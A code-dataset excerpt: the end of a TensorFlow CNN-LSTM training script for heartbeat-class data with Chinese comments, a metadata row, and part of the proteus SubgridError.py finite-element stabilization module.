tf.keras.layers.Conv1D(filters=4, kernel_size=21, strides=1, padding='SAME', activation='relu'),
# 第一个池化层, 最大池化,4 个 3x1 卷积核, 步长为 2
tf.keras.layers.MaxPool1D(pool_size=3, strides=2, padding='SAME'),
# 第二个卷积层, 16 个 23x1 卷积核
tf.keras.layers.Conv1D(filters=16, kernel_size=23, strides=1, padding='SAME', activation='relu'),
# 第二个池化层, 最大池化,4 个 3x1 卷积核, 步长为 2
tf.keras.layers.MaxPool1D(pool_size=3, strides=2, padding='SAME'),
# 第三个卷积层, 32 个 25x1 卷积核
tf.keras.layers.Conv1D(filters=32, kernel_size=25, strides=1, padding='SAME', activation='relu'),
# 第三个池化层, 平均池化,4 个 3x1 卷积核, 步长为 2
tf.keras.layers.AvgPool1D(pool_size=3, strides=2, padding='SAME'),
# 第四个卷积层, 64 个 27x1 卷积核
tf.keras.layers.Conv1D(filters=64, kernel_size=27, strides=1, padding='SAME', activation='relu'),
tf.keras.layers.LSTM(128),
# 打平层,方便全连接层处理
tf.keras.layers.Flatten(),
# 全连接层,128 个节点
tf.keras.layers.Dense(128, activation='relu'),
# Dropout层,dropout = 0.2
tf.keras.layers.Dropout(rate=0.2),
# 全连接层,5 个节点
tf.keras.layers.Dense(2, activation='softmax')
])
return newModel
def OutOfDatesetTest(TestData, TestLabel):
Y_pred = model.predict(TestData)
predict = np.argmax(Y_pred, axis=1)
# print(predict)
from sklearn.metrics import accuracy_score
print("acc:")
print(accuracy_score(TestLabel, predict))
from sklearn.metrics import precision_score
print("p:")
print(precision_score(TestLabel, predict))
from sklearn.metrics import recall_score
print("r:")
print(recall_score(TestLabel, predict))
from sklearn.metrics import f1_score
print("f1:")
print(f1_score(TestLabel, predict))
from sklearn.metrics import confusion_matrix # 导入计算混淆矩阵的包
C1 = confusion_matrix(TestLabel, predict) # True_label 真实标签 shape=(n,1);T_predict1 预测标签 shape=(n,1)
print(C1)
plt.matshow(C1, cmap=plt.cm.Greens)
plt.colorbar()
for i in range(len(C1)):
for j in range(len(C1)):
plt.annotate(C1[i, j], xy=(i, j), horizontalalignment='center', verticalalignment='center')
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
def train_data_without_F():
X = np.concatenate((X_N, X_S, X_V, X_Q))
print(np.shape(X))
y = np.concatenate((X_N_label, X_S_label, X_V_label, X_Q_label))
np.shape(y)
return X, y
def train_data_without_V():
X = np.concatenate((X_N, X_S, X_F, X_Q))
print(np.shape(X))
y = np.concatenate((X_N_label, X_S_label, X_F_label, X_Q_label))
np.shape(y)
return X, y
def train_data_without_S():
X = np.concatenate((X_N, X_F, X_V, X_Q))
print(np.shape(X))
y = np.concatenate((X_N_label, X_F_label, X_V_label, X_Q_label))
np.shape(y)
return X, y
def train_data_without_Q():
X = np.concatenate((X_N, X_S, X_V, X_F))
print(np.shape(X))
y = np.concatenate((X_N_label, X_S_label, X_V_label, X_F_label))
np.shape(y)
return X, y
def test_data_without_F():
X = np.concatenate((X_N_test, X_S_test, X_V_test, X_Q_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_S_test_label, X_V_test_label, X_Q_test_label))
np.shape(y)
return X, y
def test_data_without_V():
X = np.concatenate((X_N_test, X_S_test, X_F_test, X_Q_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_S_test_label, X_F_test_label, X_Q_test_label))
np.shape(y)
return X, y
def test_data_without_S():
X = np.concatenate((X_N_test, X_F_test, X_V_test, X_Q_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_F_test_label, X_V_test_label, X_Q_test_label))
np.shape(y)
return X, y
def test_data_without_Q():
X = np.concatenate((X_N_test, X_S_test, X_V_test, X_F_test))
print(np.shape(X))
y = np.concatenate((X_N_test_label, X_S_test_label, X_V_test_label, X_F_test_label))
np.shape(y)
return X, y
X, y = train_data_without_Q()
X_test, y_test = test_data_without_Q()
model = buildModel()
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
# model.compile(optimizer='adam', loss='binary_crossentropy',metrics=['accuracy'])
model.summary()
# 训练与验证
model.fit(X, y, epochs=50)
model.save("model/model_Q.h5")
# Y_pred = model.predict_classes(X_test)
# # 绘制混淆矩阵
# plotHeatMap(Y_test, Y_pred)
OutOfDatesetTest(X_test, y_test)
| 31.467005
| 105
| 0.670108
|
794dd5ab748d21c0db82b4304189cdc4cb87113a
| 173,983
|
py
|
Python
|
proteus/SubgridError.py
|
yuxianglin/proteus
|
ac5d5223410b1a1f270615f987e9cf327fb802af
|
[
"NASA-1.3"
] | null | null | null |
proteus/SubgridError.py
|
yuxianglin/proteus
|
ac5d5223410b1a1f270615f987e9cf327fb802af
|
[
"NASA-1.3"
] | null | null | null |
proteus/SubgridError.py
|
yuxianglin/proteus
|
ac5d5223410b1a1f270615f987e9cf327fb802af
|
[
"NASA-1.3"
] | null | null | null |
"""
A class hierarchy for subgrid error estimation methods (multiscale methods)
.. inheritance-diagram:: proteus.SubgridError
:parts: 1
"""
import numpy
import csubgridError
import FemTools
from .Profiling import logEvent
class SGE_base:
def __init__(self,coefficients,nd,lag=False,trackSubScales=False):
self.nc = coefficients.nc
self.nd = nd
self.components=range(self.nc)
self.lag=lag
self.coefficients=coefficients
self.trackSubScales = trackSubScales
self.usesGradientStabilization = False
def initializeElementQuadrature(self,mesh,t,cq):
self.mesh=mesh
self.tau=[]
self.tau_last=[]
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for cj in range(self.nc):
if cq.has_key(('df',ci,cj)):
cq[('df_sge',ci,cj)]=cq[('df',ci,cj)]
if cq.has_key(('dH',ci,cj)):
cq[('dH_sge',ci,cj)]=cq[('dH',ci,cj)]
if cq.has_key(('dm',ci,cj)):
cq[('dm_sge',ci,cj)]=cq[('dm',ci,cj)]
if cq.has_key(('dmt',ci,cj)):
cq[('dmt_sge',ci,cj)]=cq[('dmt',ci,cj)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
pass
def calculateSubgridError(self,q):
pass
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
\delta m^{n}/\delta t^{n+1}
"""
pass
class Advection_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
self.df_last = copy.deepcopy(cq[('df',ci,ci)])
cq[('df_sge',ci,ci)] = self.df_last
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.df_last[:] = self.cq[('df',ci,ci)]
def calculateSubgridError(self,q):
for ci in range(self.nc):
csubgridError.calculateSubgridError_A_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
class AdvectionLag_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
self.df_last = copy.deepcopy(cq[('df',ci,ci)])
cq[('df_sge',ci,ci)] = self.df_last
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.df_last[:] = self.cq[('df',ci,ci)]
def calculateSubgridError(self,q):
for ci in range(self.nc):
csubgridError.calculateSubgridError_A_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df_sge',ci,ci)],
q[('cfl',ci)],
self.tau[ci])
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
class AdvectionDiffusionReaction_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = copy.deepcopy(cq[('df',ci,ci)])
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = cq[('dm',ci,ci)]
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = cq[('dmt',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for ci,ckDict in self.coefficients.diffusion.iteritems():
if self.lag:#mwf looks like this was missing if lag May 7 09
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
else:
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
#mwf should these be deep copies?
self.cq[('df_sge',ci,ci)][:] = self.cq[('df',ci,ci)]
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
oldTau=False#True #mwf oldTau not working with sd!
for ci in range(self.nc):
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
#mwf debug
#import pdb
#pdb.set_trace()
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
class FFDarcyFC_ASGS(SGE_base):
"""
basic stablization for TwophaseDarcy_fc_ff, only 'mixture' equation has advection term
'w' phase equation has nonlinear diffusion wrt mixture potential,
'mixture' equation has two nonlinear diffusion terms
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
self.dftemp = None
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in [0]:
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('df',ci,ci)):
self.df_last = copy.deepcopy(cq[('df',ci,ci)])
cq[('df_sge',ci,ci)] = self.df_last
else:
if cq.has_key(('df',ci,ci)):
cq[('df_sge',ci,ci)] = cq[('df',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.cq=cq
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in [0]:
self.tau_last[ci][:] = self.tau[ci]
#self.df_last[:] = self.cq[('df',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
oldTau = False
if self.dftemp == None or self.dftemp.shape != q[('grad(phi)',1)].shape:
self.dftemp = numpy.zeros(q[('grad(phi)',1)].shape,'d')
ci = 0; cj = 0; ck = 1;
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(0,1)][0],self.coefficients.sdInfo[(0,1)][1],
self.mesh.elementDiametersArray,
q[('dmt',0,0)],
self.dftemp,
q[('a',0,1)],
q[('da',0,1,0)],
q[('grad(phi)',1)],
q[('dphi',1,0)],
q[('dr',0,0)],
q[('pe',0)],
q[('cfl',0)],
self.tau[0])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',0,0)],
self.dftemp,
q[('a',0,1)],
q[('da',0,1,0)],
q[('grad(phi)',1)],
q[('dphi',1,0)],
q[('dr',0,0)],
q[('pe',0)],
q[('cfl',0)],
self.tau[0])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
q[('dr',ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,ci)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
q[('dr',ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[0]
else:
tau=self.tau[0]
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',0)],
q[('dpdeResidual',0,0)],
q[('subgridError',0)],
q[('dsubgridError',0,0)])
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
class DarcyFC_ASGS(SGE_base):
"""
basic stablization for TwophaseDarcy_fc, no advection term
'w' phase and 'n' phase have nonlinear diffusion wrt to their own potential
phi_w = psi_w, phi_n = psi_w + psi_c
"""
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
self.dftemp = None; self.drtmp = {(0,0):None,(1,0):None}
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
for ci in [0,1]:
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.cq=cq
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in [0,1]:
self.tau_last[ci][:] = self.tau[ci]
#self.df_last[:] = self.cq[('df',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
oldTau=False
if self.dftemp == None or self.dftemp.shape != q[('grad(phi)',1)].shape:
self.dftemp = numpy.zeros(q[('grad(phi)',1)].shape,'d')
#'w' phase equation
ci = 0; cj = 0; ck = 0;
if q.has_key(('dr',ci,cj)):
self.drtmp[(ci,cj)] = q[('dr',ci,cj)]
elif self.drtmp[(ci,cj)] == None:
self.drtmp[(ci,cj)] = numpy.zeros(q[('r',ci)].shape,'d')
if self.drtmp[(ci,cj)] == None or self.drtmp[(ci,cj)].shape != q[('r',ci)].shape:
self.drtmp[(ci,cj)] = numpy.zeros(q[('r',ci)].shape,'d')
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
q['inverse(J)'],
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
self.drtmp[(ci,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
#'n' phase equation
ci = 1; cj = 0; ck = 1;
if q.has_key(('dr',ci,cj)):
self.drtmp[(ci,cj)] = q[('dr',ci,cj)]
elif self.drtmp[(ci,cj)] == None:
self.drtmp[(ci,cj)] = numpy.zeros(q[('r',ci)].shape,'d')
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ck)][0],self.coefficients.sdInfo[(ci,ck)][1],
q['inverse(J)'],
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
for ci in [0,1]:
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
#for now just compute wrt to cj?
# cj = 0
# csubgridError.calculateSubgridError_tauRes(tau,
# q[('pdeResidual',ci)],
# q[('dpdeResidual',ci,cj)],
# q[('subgridError',ci)],
# q[('dsubgridError',ci,cj)])
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',0)],
q[('dpdeResidual',0,0)],
q[('subgridError',ci)],
q[('dsubgridError',ci,0)])
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
class HamiltonJacobi_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.cq=cq
self.mesh=mesh
self.tau={}
for ci in range(self.nc):
self.tau[ci]=numpy.zeros(cq[('u',ci)].shape,'d')
if self.lag:
cq[('dH_sge',ci,ci)]=copy.deepcopy(cq[('dH',ci,ci)])
else:
cq[('dH_sge',ci,ci)]=cq[('dH',ci,ci)]
def calculateSubgridError(self,q):
for ci in range(self.nc):
csubgridError.calculateSubgridError_HJ_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('dH_sge',ci,ci)],
q[('cfl',ci)],
self.tau[ci])
csubgridError.calculateSubgridError_tauRes(self.tau[ci],
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,ci)],
q[('subgridError',ci)],
q[('dsubgridError',ci,ci)])
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.cq[('dH_sge',ci,ci)][:]= self.cq[('dH',ci,ci)]
class HamiltonJacobiDiffusionReaction_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('dH',ci,ci)):
cq[('dH_sge',ci,ci)] = copy.deepcopy(cq[('dH',ci,ci)])
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cq.has_key(('dH',ci,ci)):
cq[('dH_sge',ci,ci)] = cq[('dH',ci,ci)]
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = cq[('dm',ci,ci)]
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = cq[('dmt',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for ci,ckDict in self.coefficients.diffusion.iteritems():
if self.lag:#mwf looks like this was missing if lag May 7 09
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
else:
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
#mwf should these be deep copies?
self.cq[('dH_sge',ci,ci)][:] = self.cq[('dH',ci,ci)]
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
